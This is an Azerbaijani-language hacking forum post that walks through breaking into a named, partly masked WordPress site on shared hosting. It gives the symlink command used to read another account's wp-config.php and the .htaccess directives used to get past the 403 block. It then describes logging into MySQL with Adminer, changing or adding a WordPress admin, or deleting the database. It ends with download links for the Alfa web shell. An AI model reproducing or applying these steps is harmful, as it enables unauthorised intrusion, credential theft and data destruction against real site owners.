Salam Difai Team İstifadəçiləri
Bügün sizlərə Hədəf Sayta Hücum necə edilir onu göstərəcəm
hədəf sayt - m*esi.ru
sayt WordPress'dir
İçindən bu saytın açığını tapdım və girdim indi isə Hədəf Sayta hücüm edək
İndi isə Başlıyaq
normal ln -s yöntəmini yoxluyacam
WordPress config yolu /wp-config.php
m*esi.ru = meesir75
bu server istifadəçi adları UserRəqəm olaraq qurulub
və Alfa Shell ilə istifadəçi adını tapaq
ln -s /var/www/meesir75/public_html/wp-config.php saaa.txt
normal olaraq acilmir 403 verdi indi isə bypass edek .htaccess yolu ile))
.htaccess
Options All
ReadmeName saaa.txt
burdakı saaa.txt configini çəkdiyimiz faylın adıdır
indi isə baxaq))
yup çəkdik indi isə Adminer ilə mysql bazaya bağlanaq
indi isə wordpress şifrəsini dəyişək
wp_users
bəzən belədə olur istifadəçini şifrəsini dəyişir amma şifrə yalnış deyir
yəni ya user yaradırıq yada ki, belə DataBase silirik))
yup girdik
ALFA SHELL (LOGSUZ)
PHP:
https://raw.githubusercontent.com/cybercriminator/BaBa/master/alfa-shell-v4.1-tesla-decoded.php
https://raw.githubusercontent.com/cybercriminator/BaBa/refs/heads/master/alfav4.1-tesla.php
Sağolun Gələcək Mövzularda Görüşənədək..